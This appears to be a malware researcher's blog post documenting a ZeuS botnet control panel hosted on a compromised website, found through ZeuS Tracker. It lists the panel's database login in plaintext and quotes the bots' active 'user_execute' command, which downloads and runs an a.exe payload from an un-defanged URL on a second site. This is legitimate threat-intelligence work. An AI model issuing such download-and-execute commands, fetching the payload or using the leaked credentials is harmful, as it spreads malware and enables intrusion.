Sunday, January 12, 2014

ZeuS 2.1.0.1 - inlandbeardeddragons.com

Found C&C via ZeuS Tracker.

Panel was at:
hxxp://inlandbeardeddragons.com/templates/beez/.ama/cp.php?m=login

46 bots
config
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'inlandbe_ama';
$config['mysql_pass'] = '1qaz2wsx';
$config['mysql_db'] = 'inlandbe_ama';

Running script:
user_execute http://eyecatchersoptique.com/images/.stnfrn/server/a.exe

Admin was moving bots to ZeuS 2.9.6.1

This is from the same admins researched here.

a.exe
https://www.virustotal.com/en/file/cac8ede4d09c2728f12421b6648da204e5a84561ebf3d9012fe39e0aa83a56fb/analysis/1389472180/

https://malwr.com/analysis/YjdiNThhZjc3MThmNGZmYmE3NmMwYThlNzZhMzdjYmY/

No comments:

Post a Comment